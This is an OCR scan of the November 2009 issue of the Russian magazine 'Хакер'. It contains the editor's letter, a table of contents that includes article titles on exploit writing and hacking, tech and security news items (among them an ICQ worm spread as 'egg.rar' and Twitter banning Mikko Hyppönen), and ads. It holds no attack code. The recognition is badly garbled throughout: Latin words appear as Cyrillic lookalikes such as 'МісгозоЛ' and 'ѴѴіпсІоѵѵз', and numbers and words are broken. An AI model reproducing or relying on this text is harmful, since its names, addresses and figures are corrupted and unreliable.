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Журнал Хакер невозможно было бы представить без читателей и, самое главное, без читательского влияния 
на журнал. Начать надо с того, что все редакторы X в свое время были увлеченными читателями и попали 
сюда, пожелав поделиться с другими людьми своими идеями. 

В общем, чем больше активности исходит от читателей - тем Хакеру лучше. Именно поэтому мы на каждом 
углу печатаем свои контакты: чтобы тебе было просто делиться с нами своими идеями и предложениями. 

Я тебя пламенно призываю сразу писать мне обо всех новых идеях, обо всех темах и статьях, которые ты хотел 
бы увидеть, обо всех вещах, которые тебе нравятся или раздражают в журнале. И особенно круто, если ты ви- 
дишь в себе силы писать в X статьи - мы на 1 00% открыты к таким вещам, радуемся каждому новому автору 
и даже платим за это деньги. Так что если есть идеи и желание работать - камон, гай! 



пікііогг, гл. ред. X 

пікіІ 02 Іа)геаІ.хакер.ги 

ѵѵѵѵѵѵ.гіпдОсир.ги 
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Нет вопросов, главное событие осени — релиз новой винды! И, хотя 
мы уже очень много писали про ѴѴіпсІоѵѵз 7, разглядывая систему с 
разных сторон, было бы безумием не написать чего-то нового сразу 
после релиза системы. 



Поэтому мы решили сделать подборку с самыми интересными фичами 
новой ѴѴі псіоѵѵз, чтобы ты еще раз оценил преимущества семерки и 
был в курсе всех улучшений и новых фишек, которые реализовали 
разработчики МісгозоИ 




Сопіепі Ноябрь 2009 



МедаЫеѵгс 

004 Все новое за последний месяц 

Репчіт 

016 ЧИПОВЫЕ видюхи 

Тестирование бюджетных графических адаптеров 

020 А51І5 М60^ 

Мощь Соге І7 и СІЮА 

022 СПАСИ И СОХРАНИ 

Чулок для варезных сбережений 

РС_20№. 

024 МУЗЫКАЛЬНАЯ ЛИХОРАДКА 

Хакерская жизнь припеваючи :) 

030 ФАБРИКА СПЛОИТОВ 

Учимся писать эксплоиты 
для Меіазріоіі Ргатеѵѵогк 

038 ЛУЧШИЕ ИНСТРУМЕНТЫ ПЕНТЕСТЕРА 

Тема — статический анализ кода 

Взлом. 

042 ЕА5Ѵ-НАСК 

Хакерские секреты простых вещей 



046 ОБЗОР ЭКСПЛОИТОВ 

Разбираем свежие уязвимости 

052 РЕВОЛЮЦИЯ В *ШХ-СИСТЕМАХ. 

Новый взгляд на повышение привилегий 

056 КЗШ ДЛЯ ХАКЕРА 

Атака на кэш ѴѴіпсІоѵѵз 

062 СОЦИАЛЬНЫЙ ВЗЛОМ 

Реп-Тезбпд популярного движка соцсети 

066 х-тооьз 

Программы для взлома 

Сцена . 

084 ВЕРШИНА ПИЩЕВОЙ ЦЕПИ 

Огасіе, 5ип и все, все, все 

Юниксойд 

072 СВОЙ СРЕДИ ЧУЖИХ 

Восстанавливаем данные с РАТ, ІЧТР5 
и II Р5, не покидая Ыпих 

076 ПОЩАДЫ НЕ БУДЕТ! 

Энциклопедия ІІКІІХ-западлостроений 

082 ПАНАЦЕЯ НА ФЛЕШКЕ 

Создаем мультизагрузочную 
флешку на все случаи жизни 

Кодинг. 

086 ПРОЯВИТЕЛЬ ДЛЯ ТРОЯНОПИСАТЕЛЕЙ 

Детектируем скрытые 
процессы в изегтосіе и гіпдО 

090 СНИФЕР ОСОБО КРУПНОГО МАСШТАБА 

Ковыряем Ѳоодіе Арр Епдіпе: 
снифер на РуТбоп’е 

094 ВЗРОСЛЫЕ ИГРЫ В ЭЛЕКТРОННОЙ ПЕСОЧНИЦЕ 

Программим персональный 
ЭапсІЬох на сишарпе 

098 КОДЕРСКИЕ ТИПСЫ И ТРИКСЫ 

Три правила кошерного кодинга на С++ 

5УЫ/АСК. 

102 СИНХРОННЫЙ ЗАПЛЫВ 
НА ДАЛЬНЮЮ ДИСТАНЦИЮ 

ѴѴі псіоѵѵз 7 и ѴѴі псіоѵѵз 
Эегѵег 2008 П2: новое 
в сетевых возможностях 

1 08 ФОРПОСТ ДЛЯ ЗАЩИТЫ ПЕРИМЕТРА 

Рогеітопі ТМ6: наследник ІЗАЗегѵег 
с еще большим функционалом 





114 Ш ОА РОСІІЗ 

Обзор серверных железок 

116 ТОНКАЯ ГЕНЕРАЛЬНАЯ ЛИНИЯ 

Пересаживаем офисный 
планктон на тонкие клиенты 
под управлением ТЫпзІайоп 

122 ПО ДОРОГЕ С ОБЛАКАМИ 

Пошаговое руководство 

по созданию инфраструктуры 

облачных вычислений на базе Еисаіуріиз 

ФРИКИНГ 




128 ВКЛЮЧЕНИЕ КОМПЬЮТЕРА 
ДЛЯ ЛЕНИВЫХ 

Включаем и выключаем 
компьютерную периферию 
одной кнопкой 

Юниты 

132 Р5ѴСН0: СРЕДСТВА 

массового зомбирования Способы, приемы 
и механизмы манипуляции массовым 
сознанием с использованием СМИ 

140 РА01ШІТЕ0 

Большой РАО 

143 ДИСКО 

8.5 Гб всякой всячины 

144 мт 

Удобные ѵѵеЬ-сервисы 
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МАРИЯ «МІРК!У_» НЕФЕДОВА МІРРІИгаКЕАІ.ХАКЕР.Ки 



МЕ6АЫЕ№ 

ОБО ВСЕМ ЗА ПОСЛЕДНИЙ МЕСЯЦ 



ИГЛА В ЯЙЦЕ, ЯЙЦО В УТКЕ, УТКА В ЗАЙЦЕ, ЗАЯЦ В ШОКЕ 




ВИКИПЕДИЯ В КАРМАНЕ 



Интересных гаджетов в мире 
много, но рынок карманных эн- 
циклопедий, словарей, перевод- 
чиков и тому подобных девайсов 
нельзя называть переполненным. 
Так что устройство ѴѴікіРеабег, 
содержащее более 3 млн. статей 
из ѴѴікіребіа, явно найдетсвоих 
пользователей. Официальный 
сайтзаверяет, что крошечная 
коробочка стремя кнопками 
способна проработать от двухААА 
батареек целый год. С учетом того, 
что сенсорный экран устройства, 
хоть и лишен цвета и подсветки, 
но базируется отнюдь не на е-іпк 
технологии, цифры определенно 



приукрашены. Зато девайс легок, 
компактен, предельно прост в ис- 
пользовании и дешев — всего $99. 
Еще один плюс проекта в том, что 
он полностью опенсорсовый, так 
что в будущем ѴѴі кі Реасіег вероят- 
но обрастетмногими полезными 
«бонусами». Кстати, создатели 
ѴѴі кі Реасіег, видимо, очень страш- 
ные люди — они встроили в свое 
устройство отличный таймкиллер: 
кнопку «гапбот», на которую 
можно нажимать часами, убивая 
время и аккумуляторы. По сути, 
единственный минус этого де- 
вайса в том, что работает он пока 
только санглийским языком. 




Файлообменник йіе.дір.ги . который под каждым размещенным 
файлом пишет «ТезіесІ Ьу Казрегзку АпС-Ѵігиз», прошляпил очень 
неприятную заразу. В конце октября многим дір-юзерам пришли 
сообщения от проверенных контактов, со ссылкой на скачивание 
некого файла едд.гаг. На логичный вопрос пол ьз о вате л ей -пара- 
ноиков: «что это?», контакт отвечал «нечто позитивное», а если 
юзер не сдавался и продолжал спрашивать, в ответ приходило: 
«ты не в церкви, тебя не обманут». Получив ответ, большинство 
юзеров успокаивалось и шло по ссылке, где, конечно, находился 
вирус (ну, «справедливости ради», юзеру даже демонстрировали 
картинку с яичницей]. После попадания на машину «яичный» 
малварь угоняет ісд-аккаунти рассылаетлинкна себя всем 
контактам. В процессе рассылки вирь, ктомуже, разговаривает, 
отвечая на фразы, содержащие слова «что», «че», «шо», «чего» и 
такдалее, фразой «нечто позитивное». Только с Гііез.дір.ги заразу 
успело скачать больше 14.000 человек (потом файл удалили]. 
Хитрый, «говорящий» вирус еще явно вернется, так что не стоит 
терять бдительности. 



В РАШІ.АВ5 ЕЖЕДНЕВНО ПОДУЧАЮТ 
ДО 50.000 ОБРАЗЧИКОВ НОВОГО 
ВРЕДОНОСНОГО ПО. ЕЩЕ НЕДАВНО ЭТА 
ЦИФРА РАВНЯЛАСЬ 37.000 ВДЕНЬ. 

РАБОТА ДЛЯ 
ПРОГРАММИСТОВ 
ЗА РУБЕЖОМ 

Мало кому из Т-шников незнаком сайт зІаскоѵегПоѵу.сот . детище тал- 
антливого программиста и бизнесмена Джоэля Спольски. Ресурс являет 
собой помесь йідд сѴѴікіребіа и сайтом вопросов-и-ответов. Многим 
будет интересно узнать, что СіаскОѵегГІоѵѵ расширяется, открывая новый 
раздел Сагеегз. Как нетрудно догадаться, эта часть сайта призвана 
помочь специалистам-прогерам с поиском работы. Свое резюме можно 
интегрировать с профилем на сайте, а его просмотр для потенциальных 
работодателей будет платным. Впрочем, платным является и размеще- 
ние резюме: для студентов первый год пользования Сагеегз бесплатно; 
для разместивших свои резюме до 9-го ноября юзеров абонентская 
плата равна $29 за 3 года; для всех«проснувшихся» после 10-го ноября 
абонентская плата составит $99 за 1 год. 
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Срок проведения акции с 09.10.2009 по 09.12.2009. Цена 4990 руб. на МТС 736 действительна 
при покупке данного телефона в Комплекте с тарифами «Длинные разговоры», «Много звонков» 
или «Веб Епегду». Цена указана с НДС и действует в сроки проведения акции. Пакеты 300 минут 
на исходящие звонки абонентам МТС «домашнего» региона и 300 ЗМЗ абонентам мобильных 
операторов «домашнего» региона предоставляются при покупке Комплектов в период проведения 
акции и действуют, только если абонент находится в «домашнем» регионе. 

На телефон МТС 736 предоставляется 1 год гарантии и 2 года бесплатного сервисного 
обслуживания при условии активности контракта МТС в течение 3 месяцев, предшествовавших 
дате обращения в сервис. 



МТС 



оператор связи 



МТС 736 



300 минут и 300 5М5 в подарок! 



Продается в салонах-магазинах МТС 

Звоните 8 800 333 08 90 / ѵуѵуѵу.шІБ.ги 



Продажи 
уже стартовали 



4990 руб. 



3 года гарантийно-сервисного обслуживания, 
слайдер, камера 2,0 Мріх, цветной дисплей, 
слот для тісго 50™, ММ5 / Е-таіІ, 
ВІиеІхюШ®, РМ-радио, медиаплеер 
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РС27 

■о 



ПЕРЕСТРАХОВЩИКИ 

ТѴѴІТТЕК 



Чудесные дела творятся в микроблогинговом сервисе 
ТѵѵіЧег. Аккаунт известного спеца по информационной 
безопасности, главы Р-5есиге МиккоХиппонена оказался 
забанен без предупреждений и объяснений. Когда удив- 
ленный Хиппонен обнаружил блок и связался с саппортом, 
ему сначала не отвечали два дня, а потом сообщили, что 
пару месяцев назад он разместил в своем блоге ссылку на 
малварь, что должно караться по всей строгости. Ссыл- 
ка действительно была —Хиппонен ссылался на ресурс 
ѵзресе.сопт [фишинговый фей к под тѵзрасе.сот ). 
при этом специально написав адрес сайта через пробелы, 
дабы ссылка не была активной. В «криминальном» посте 
он недоумевал, кто может повестись на такую очевидную 
разводку, но все же предупреждал своих фоловеров об 
опасности и призывал их не ходить по приведенному ад- 
ресу. Казалось бы, обычная ситуация для блога по ИБ, где 
часто пишуто вредоносном ПО и «нехороших сайтах», но 
нет, сап порту Тѵѵіиег понадобилось несколько дней, чтобы 
разобраться, и лишь потом блокировку сняли. Хуже того, у 
Хиппонена при этом «слетели» все настройки, и очистился 
списокфоловеров (коих было более 3-хтысяч]. В итоге, 
восстановили и это, но оченьхочется спроситьу саппорта 
ТѵѵіЧег’а — ѴѴТР, господа? 




Ш00ѴѴЗ 7 БЬЕТ РЕКОРДЫ ПРОДАЖ. НА 
АМА20Ы.С0М.0К УЖЕ ЧЕРЕЗ 8 ЧАСОВ ПОСЛЕ 
ОТКРЫТИЯ РКЕ-ОКОЕК БЫЛО ПРОДАНО БОЛЬШЕ 
КОПИЙ ѴШ00ѴѴ5 7 . НЕЖЕЛИ ѴІ5ТА ЗА ВЕСЬ 
ПЕРИОД ПРЕДВАРИТЕЛЬНОГО ЗАКАЗА. 



ИЗ ЖИЗНИ ПОИСКОВИКОВ 




Компания М іеговой опередила Ооодіеи первой запустила поиск по ТѵѵіЧег. Новинка 
пока пребывает в стадии бета-теста, но уже доступна по адресу ѵѵѵѵѵѵ.Ыпд. сот/ 

ІѵѵЧіе . На главной странице ІѵѵіЧег-поиска отображаются самые популярные на 
данный моментв «Твиттере»темы, а ниже сгруппированы найденныетвиты по 
каждой из них. На каждый твит можно ответить прямо из поисковика — для этого име- 
ется специальная кнопка. Результаты пользовательских поисковых запросовтакже 
выводятся в реальном времени, в виде ленты ствитами. Чтобы успевать читать поток, 
предусмотрена кнопка Раизе. 

Но и боодіе тоже занимается разработкой ТѵѵіЧег-поиска. Их вариант должен поя- 
виться в ближайшие месяцы. Поиск от Ооодіе будетсоциальным — первыми среди 
результатов будут выводиться ссылки на твоих друзей, если они что-то писали по 
искомой теме в каких-либо соц. сетях. Конечно, чтобы все это заработало, оттебя и 
твоих френдов потребуются заполненные анкеты в Ооодіе РгоЫе. 

А пока гиганты увлечены гонкой, детище Стивена Вольфрама — «умный поисковик» 
ѴѴоИтатАІрЬа, открывает АРІ. Воспользоваться информацией сможет каждый, но 
не бесплатно. Самый дешевый тарифный план, ориентированный на частных лиц, 
таков: $60 за 1000 запросов и $0.08 за каждый запрос сверх лимита, а самый дорогой, 
ориентированный на крупные компании: $220.000 за 10 млн. запросов в месяц, 
каждый запрос сверх лимита $0.023. Известно, что одними из первых клиентов 
ѴѴоИтатАІрЬа АРІ уже стала компания МісгозоН, опять же со своим поисковиком Віпд. 



ДЕШЕВО И СЕРДИТО 

Множество производителей по всему миру сейчас бьются над снижением цен на свои 
нетбуки, чтобы сделать их еще дешевле и доступнее. Но впереди планеты всей тра- 
диционно оказались... Конечно, китайцы. Китайская компания Зипдѵѵогісі выпустила 
девайс, который являет собой что-то среднее между КПК, нетбуком и фоторамкой. Ну, 
а какеще оха рактеризовать устройство с ѴѴі псіоѵѵз СЕ на борту, 7" дисплеем (800x480), 
128 мб ОЗУ, процом АРМ ѴІА на 300 МГц и 1 ГБ флэш-памяти вместо харда? Зато у 
попате нетбука имеется поддержка 802.1 1 Ь/д сетей, одного заряда батареи хватает 
на 2-3 часа, весит девайс всего 0.7 кг, и при этом его цена равна всего $73 (500 юаней)! 
Похоже, такими темпами мы скоро докатимся до выпусков и продаж одноразовых 
нетбуков :). 
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Минздравсоцразвития России предупреждает: 



ЫМ1ТЕО ЕОІТІОЫ 



открывай 



Хочешь делать кофе, как самый лучший бариста Рима, научиться сводить треки, как 
модные диджеи Ибицы, выступить в роли опытного бармена на вечеринке друзей? 

Сделай шаг навстречу ярким впечатлениям на ѵѵѵѵѵѵ.сатеі-^ате.ги 



Каждый месяц — новые открытия и призы! 



ЗІМСЕ 1913 
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ОШИБОЧКА ВЫШЛА 



Великий человек, изобретатель ѴѴѴѴѴѴ сэр Тимоти Бернерс- 
Ли сделал очень забавное заявление: в ходе общения с 
представителем журнала Тітез, Бернерс-Ли признался, 
что использование в адресе двойного слеша после «ЫТр:» 
практически бессмысленно. По его словам, БПІ_ можно 
было спроектировать и без использования косой черты, 
просто 20 лет назад это показалось неплохой идеей, потому 
как о последствиях никто не подумал. Теперь же Бернерсу- 
Ли очень стыдно за человеко-часы, которые миллионы 
людей потратили на набор лишних «/» и на исправление 
ошибок в адресах, стыдно за тонны чернил и бумаги, пере- 
веденных на печать бесполезных знаков, и так далее. 

Так что, товарищи девелоперы, не повторяйте ошибок 
«отца Интернетов», думайте, перед тем как идти по пути 
наименьшего сопротивления и воплощать в жизнь «непло- 
хие идеи» :). 





ПО ДАННЫМ ВИРУСНОЙ ЛАБОРАТОРИИ Е5ЕТ, САМЫЙ «ПОПУЛЯРНЫЙ» Е РОССИИ 
ВИРУС, ЭТО ЧЕРВЯК СОШСКЕК. ВЕРСИЕЙ ШНСКЕК-АА БОЛЕЕТ 7 . 68 % 
МАШИН, А СОЫГІСШ.АЕ 4 . 68 %. 

УБИЙСТВЕННАЯ ТОМОГРАФИЯ 



Пока «Скайнет» не осознал себя, люди сами, 
вручную готовы «помогать» машинам в 
нелегком деле «убийства всех человеков». 
Проще говоря, пока что все случаи «агрес- 
сии со стороны машин» сводятся кошибкам 
программистов и несоблюдению элементар- 
нойТБ. Очереднойтому пример — сотрудники 
больницы Сесіагз-Біпаі МесІісаІСепІюгизЛос- 
Анджелеса, которые решили самостоятельно 
перепрограммировать свой томограф. Цель 
у них, какобычно, была благая — они хотели 
внедрить новый вид рентгеновского иссле- 

ЧУДО-МЫШЬ И НЕ ТОЛЬКО 



дования, чтобы более эффективно обнаружи- 
вать нарушения мозгового кровообращения. 
Вместо этого горе-программисты ошиблись, и 
томограф на протяжении 18 месяцев поджа- 
ривал нечего не подозревающим пациентам 
мозги, выдавая дозу радиации, в восемь 
раз превышающую норму. Вскрылось все 
совершенно случайно, когда один из больных 
пожаловался на выпадение волос. Оказалось, 
что всего от радиоактивной машины успело 
пострадать более 200 человек. Пожалуй, лучше 
уж«Скайнет», чем такое. 



Компания Арріе представила миру очередную 
порцию новинок, доказав, что еще не разу- 
чиласьудивлять. Новая мышь Мадіс ппоизе 
моментально стала центром внимания ком- 
пьютерщиков всего мира, и тому есть причины. 
Отсвоих предков из семейства МідЬТу Моизе 



девайсунаследовал разве что форму и базовые 
характеристики, все остальное поражает. Мышь 
беспроводная, подключается к компьютеру 
через ВІиеІюоШ и работает от АА батарей 
(одного заряда должно хватать на 3-4 месяца). 
Кнопоку устройства нет. Вообще. Вместо этого 




вся поверхность мыши является сенсорным 
тачпадом, который заменяет собой и скролл и 
кнопки, и открывает множество других удобных 
возможностей (например, масштабирование и 
горизонтальный скролл). Цена МідЫу Моизе для 
Штатов составляет $69, также мышь поставляет- 
ся с новыми іМас. 

Но обновления коснулись нетолько периферии: 
так, диагональ дисплеев і Мае увеличилась 
до 27 ", а «под капотом»у нихтеперь будут и 
4-ядерные процы (ІпІеІСоге І5 2.666Н2 и Соге І7 
2.8(3 НЦ. Линейка Мае тіпі пополнилась новыми 
моделями, втом числе, серверной версией. 
Бюджетный МасЬоок, в свою очередь, получил 
ипібосіу-корпус, стеклянный МиШ-Тоисб тачпад, 
встроенный аккумулятор и БЕО-подсветку 
дисплея. 
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Яркий след твоей индивидуальности 

Первая в мире фотокамера со встроенным проектором 



Ыікоп 



Основа изображения 




СООЬРІХ 51000рі 

В каждом из нас скрыта яркая индивидуальность. 
Возьми в руки новый ІМікоп Сооіріх 5 1 0ООрі. 
Стильный корпус в мечтательно-серебряных 
или загадочно-черных тонах заключает в себе 
не только высококачественную фотокамеру, 
но и встроенный проектор. Снимай свою жизнь 
и продемонстрируй друзьям на что ты способен. 



‘елефон горячей линии: (495) 733-91-70 



Это не просто фотокамера. Это №коп 



Приглашаем в Гѵіікоп 5сЬооІ : - тематические лекции для желающих освоить искусство фотографии 



Интернет-магазин: \ѵѵ^.пікоптагкеТ.ги 
Реклама. Товар сертифицирован 



с помощью зеркальной камеры. Ждем вас в московской фотостудии Ыікоп. подробности на ѵѵѵѵѵлпікоп.ги 



* ЗсЬооІ - Школа 





МЕ6АЫЕѴѴ5 




РІКАТЕ ВАУ ЗАСЕЛ 
В ЯДЕРНОМ УБЕЖИЩЕ 



ЕРВЫИ 
ФФЛАИН 
МАГАЗИН 
МІСР050РТ 



Летом мы писали отом, что МісгозоЛ собирает- 
ся открыть фирменные оффлайновые магазины 
МісгозоЛ Зіоге и успеть к релизу ѴѴіпсІоѵѵз 7. Что 
ж, МісгозоЛ сдержала свое обещание — пер- 
вый МісгозоЛ Зіоге распахнул свои двери вТЦ 
РазЫоп Зциаге в Скоттсдейле (штат Аризона, 
США] в день выхода новой ОС — 22 октября. Как 
и ожидалось, магазин МісгозоЛ напоминает 
магазины Арріе — тот же минимализм, много 
пространства и света, все можно потрогать 
руками, осмотреть и «понюхать». Магазин 
поделен на четыре зоны, каждая из которых 
сфокусирована на разныхтехнологиях. Купить 
и опробовать в МісгозоЛ Зіоге можно все, от 
софта илителефона на базе ѴѴіпсІоѵѵз Мобііе, до 
Х-Вох или лаптопа. 



ѴОІЛІШЕ С РАДОСТЬЮ 
СООБЩИЛ МИРУ, НТО 
КОЛИЧЕСТВО ПРОСМОТРОВ 
ДОСТИГЛО 1 МЛРД. 

В ДЕНЬ (ПРИМЕРНО 

11. 5 74 в секунду). 



Правообладатели не оставляют попытки загнатьТЬе Рігаіе 
Вау в угол, то есть отключить ресурс любыми средствами. 
Последние пару месяцев особенно усердствует голландская 
организация В Р ЕІ N . В основном В РЕІ N действует обходны- 
ми путями, оказывая давление на провайдеров и хостеров, 
в результате чего те перекрываюттрекеру кислород. В 
свете этого ТРВ был вынужден переехать. Согласно слухам, 
сначалатрекер переместил сервера из родной Швеции 
на Украину, нотам задержался ненадолго и уже через не- 
сколько дней перебрался в родныедля ВРЕІ N Нидерланды. 
На первый взгляд это решение кажется странным, ведь в 
Нидерландах на работутрекера наложен судебный запрет. 
Но на делеТРВ мигрировал в дата-центр СуЬегВипкег, 
который провозгласил своютерриторию независимым 
государством еще 7 лет назад :). И бункер, между прочим, 
самый настоящий — это подземное сооружение, в 50-е годы 
служившее командным пунктом НАТО. Продали его еще в 
90-е, и купившие его чуваки не растерялись и заявили, что 
разземлюони купили неу властей, а у НАТО, то они объяв- 
ляют себя государством «КиберБункер». Среди владельцев 
бункера, кстати, значится Свен Олаф Камфуис, хакер, также 
известный под ником СВЗВОВ. В своей крохотной конс- 
титуционно-демократической республике он министр по 
телекоммуникациям, носящий титул принц Свен Олаф фон 
КиберБункер. 
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I ПОДЪЕМНАЯ СИЛА 



Взять энергетический барьер. 
Высоту за высотой. День за ночью. 
Решительно есть чем заняться! 



лит 



МЕ6АЫЕѴѴ5 



БОГАТСТВО ВЫБОРА 

Еврокомиссия все же определиласьстем, что конкретно нужно сделать 
компании МісгозоК, дабы не притеснять на рынке другие браузеры. 
Напомним, что компании Орега и Могіііа, а также европейские а нтимоно- 
польщики, давно возмущаются по поводутого, что ІЕ является в ѴѴіпсІоѵѵв 
браузером поумолчанию, и дело дошло до высших инстанций ЕС. В итоге, 
Еврокомиссия утвердила на 5летЬа((о1:5сгееп,тоесть«экран выбора [брау- 
зера]». Теперь при установке ѴѴіпсІоѵѵз европейским юзерам на выбор будет 
предоставляться несколько разных браузеров (в список войдут наиболее 
популярные на территории Европы софтины]. В окошке выбора можно будет 
ознакомиться с подробным описанием для каждого из них, также здесь 
разместятся ссылки на последние версии программ. Стоит сказать, что 
никто не помешаетустановить несколько браузеров сразу — необязательно 
выбирать один. 

ПОКА ДРУГИЕ БЕДСТВУЮТ. 6006 І.Е 
ПРОЦВЕТАЕТ - ДОХОДЫ КОМПАНИИ 

выросли до $ 5.95 млрд, за 

КВАРТАЛ. НТО НА 7 % ВЫШЕ 
ПРОШЛОГОДНЕЙ ОТМЕТКИ. 

КАЧЕСТВЕННЫЙ И-НЕТ ВСЕГДА И ВЕЗДЕ 




Финны, что называется, жгут — правительство Финлян- 
дии объявило широкополосный доступ (со скоростью не 
менее 1 МЬрз] в интернет фундаментальным правом че- 
ловека. Нет, повальной халявы не будет, просто отлюбого 
домохозяйства до точки высокоскоростного подключения 
к сети теперь должно быть не более двух километров. К 
2015 году, кстати, скорость доступа планируют поднять до 
ЮОМЬрз. Реализовать такое в небольшой стране (насе- 
ление Финляндии составляет всего 5 с чем-то миллионов 
человек] вполне возможно. Всего стран, признавших 
доступ в интернет фундаментальным правом, теперьстало 
целых четыре — Эстония, Франция, Греция и Финляндия :). 
Нотолько финские власти установили конкретную планку 
скорости, закрепив за людьми право на ЬгоасІЬапсІ. Закон 
вступит в силу с июля 2010 года. 





ПАЗН РІ.АѴЕК СТАН 
КРОССПЛАТФОРМЕ 



ЕТ 

НЫМ 



АсІоЬе 



Компания АсІоЬе официально сообщила, что АсІоЬе Е(азЬ Р(ауег 10.1 будет работать не только с ПК, 
то есть с ѴѴіпсІоѵѵз, МасіпІюзЬ и У л их, но и с мобильными платформами — ѴѴіпсІоѵѵз МоЬіІе и Ра(т 
ѵѵеЬОЭ. Новинка появится в виде беты до конца текущего года. А в начале 201 0-го выйдет версия 
для девайсов под управлением 6оод(е АпбгоісІ и ЭутЬіап 05. Еще позже ожидается и РІазГі для 
В(аскЬеггу. Мобильная версия будет поддерживать жесты, акселерометры, смену положения 
экрана и мультитач. Помимоэтого ЕІазЬ Р(ауег 10.1 получит полноценноеускорение вывода 
средствами видеосистемы, одновременно научившись экономить ресурсы и энергию. Обделены 
всем этим счастьем пока остаются только владельцы іРЬопе. Представители АсІоЬе утверждают, 
что в Арр(е не желают с ними сотрудничать. 
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ЦРУ ВЛОЖИТ ДЕНЬГИ 
В «ШПИОНСКИ 1» СТАРТАП 



Центральное разведывательное управление 
США старается не отставать от прогресса и 
видитв интернете огромный потенциал, в час- 
тности, для получения информации. Подтверж- 
даетэтот факт инвестиционное подразделение 
ЦРУ Іп-О-Теі, которое собирается инвестиро- 
вать средства в стартап ѴізіЫе ТесЬпоІодіез. 
Компания ѴізіЫе ТесЬпоІодіез разрабатывает 
софт для мониторинга социальных медиа. 

Их ПОуже сейчасумеет отслеживать более 
полумиллиона ѴѴЕВ 2.0-сайтов, в числе 
которых различные блогинговые сервисы, 
Рііскг, ѴоиТиЬе, ТѵѵіІТег и Атагоп. «Не по зубам» 
им пока остаются лишь социальные сети 
закрытого типа, такие какзападный РасеЬоок 
или наш «ВКонтакте». Очевидно, с приходом 
инвестиций, этот «последний бастион» тоже 
падет. Также ПО ѴізіЫе ТесЬпоІодіез умеет 
анализировать содержимое постов, определяя 
его как позитивное, негативное, смешанное 
или нейтральное. ЦРУ определенно идет по 
правильному пути. 




АЗІІ8 ѴѴЬ520дУ 




первый маршрутизатор 
со встроенным 
сервером печати 
и сканирования! 




"Ч 





V А51У5 ЕІЗеіир - 
предустановки для 
Іпіегпеі провайдеров 
в большинстве 
городов России! 



Доступ в Іпіегпеі и беспроводная 
сеть для всей семьи 




- ѴѴІРІ 125Мбит/с 

- Удобный интерфейс пользователя на русском языке 

- Порт 115В для подключения большинства 
принтеров и МФУ 

- Выделенные порты для подключения приставки ІРТѴ 




Всемирная гарантия 2 года ѴѴѴѴѴѴ.аЗІіЗ.Ги Горячая линия А$У5: (495) 23-11-999 

Дистрибьюторы: БЮРОКРАТ (495) 745-55-11; Коосіоо Тесііпоіодіез (499) 256-17-31; ОЮІ (495) 22-11-111; ПИРИТ-Дистрибуция (495) 974-32-10; ТШТѴ-ЕІ.ЕСТК0МІС5 шѵѵ.ігі-еі.ги 




Іпзрігіпд Іппоѵаііоп • Регзізіепі РеіТес(іоп 



ДОМЗ° 




МЕ6АЫЕѴѴ5 



ВИНЧЕСТЕРЫ С Е-МК 
ДИСПЛЕЕМ 

Компания ѴѴезіегп ОідіТаІ представила новые модели внешних«винтов» Му Воок 
Еіііе и Му ВоокЗШсІіо. Оба девайса интереснытем, что на ихлицевой панели рас- 
полагается небольшой е-іпк дисплей, который работает даже когда устройство не 
подключено к компьютеру. На экран можно вывести шкалу, отображающую количес- 
тво свободного места на диске, метку диска или краткое описание его содержимого 
(оченьудобно, если девайсов несколько и внешне они совершенно одинаковые]. 
Также дисплей сообщит, защищены ли данные 256-битным аппаратным шифро- 
ванием и паролем. Настройка описанного осуществляется через программу Ѵ\Ю 
ЗппагіѴѴаге, которая занимается непрерывным автоматическим резервным копиро- 
ванием данных. Заметим, что Му ВоокЗШсІіо предназначены для Мас-юзеров (они 
отформатированы надлежащим образом и совместимы сТітеМасЬіпе]. Подключе- 
ние обоих девайсов к компьютеру осуществляется через интерфейс Б5В 2.0. 



ФОТО-ХОСТИНГ РИСКК ВЗЯЛ НОВУЮ ПЛАНКУ: 
КОЛИЧЕСТВО РАЗМЕЩЕННЫХ НА НЕМ 
-о ФОТОГРАФИЙ ПЕРЕВАЛИЛО ЗА 4 МЛРД. 









УДОБНЫЙ МАРШРУТИЗАТОР 
0ТА3113 



Азиз представила публике новый 
беспроводной маршрутизатор Азиз 
ВТ-141311, с возможностью подклю- 
чения принтера или многофункцио- 
нальныхустройств для сетевой печати 
и сканирования. Девайс имеет три 
режима работы: Воиіег используется 
при подключении к провайдеру через 
ЕіЬегпеІ-кабель; АР (Ассезз Роіпі] 
позволит подключаться ксети беспро- 
водным клиентам; Вереаіегзначитель- 
но расширитзону охвата существующей 
беспроводной сети. В комплекс ПО 
девайса входитутилита Азиз Е25еТир, 
разработанная специально для России. 
Благодаря ей настроить доступ в ин- 
тернет можно буквально за считанные 
минуты, и для этого необязательно быть 
админом. Юзеру понадобится лишь 
выбрать из приведенного списка город 
и провайдера (80 городов и более 100 



провайдеров], а также ввести минимум 
данных, выданных при заключении 
договора. Благодаря Азиз Е2 БЫ осталь- 
ные настройки не станут проблемой. 
Сервисы настройки и управления (015, 
Ыеіѵѵогк Мар, Бг. 5игТ, АіОізк, Е20о5 и Е2 
МЕР] покажут карту сети, продиагнос- 
тируют и устранят неполадки, позволят 
организовать персональный ЕТР-сер- 
вер для обмена файлами, находящими- 
ся на подключенном ІІ5В-накопителе, 
и так далее. В комплект поставки входит 
утилита Ооѵѵпіоасі Мазіег, по сути — пол- 
ноценный торрент-клиентс поддержкой 
трекеров, использующих рейтинг. 
Маршрутизатор оснащен внутренней 
антенной, поддерживает ЕіЬегпеІ: и 
802.3, беспроводные 802.1 1 п/д/Ь, и «по- 
нимает» следующиетипы соединений: 
Аиіотабс ІР, ЗіаЕіс ІР, РРРоЕ (подде- 
ржка МРРЕ), РРТР, Б2ТР. 
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ВИРУСЫ КАК ПОД 
МИКРОСКОПОМ 

Интересные экспериментальные функции 
появились у сервиса ѴѴеЬтазІегТооІз от 
Соодіе. В случае заражения сайта каким- 
нибудь злобным мал ва рем, зарегистриро- 
ванных в ѴѴе Ь плазме г Тооіз юзеров, не только 
известят о заражении, ной покажут им, на 
каких конкретно страницах найдены следы 
«инфекции», и предоставят к ознакомлению 
сам «нехороший» код. Последнее сущест- 
венно облегчит и ускорит поиск вирусов, а 
также ихубийство. По возможности сервис 
даже постарается объяснить админу, из-за 
чего именно про изо шло заражение его 
ресурса. Учитывая, что массовые взломы 
сайтов в последнее время становится прак- 
тически нормой, а админы, зачастую, даже 
не замечают, что их хакнули, новые функции 
могут оказаться очень полезны для всех. 





МАССОВЫЙ ВЗЛОМ 
НОТМА I. 

Как стало известно, более 10.000 аккаунтов ѴѴі псіоѵѵз І_іѵе 
Ноітаіісовсем недавно были взломаны неизвестными 
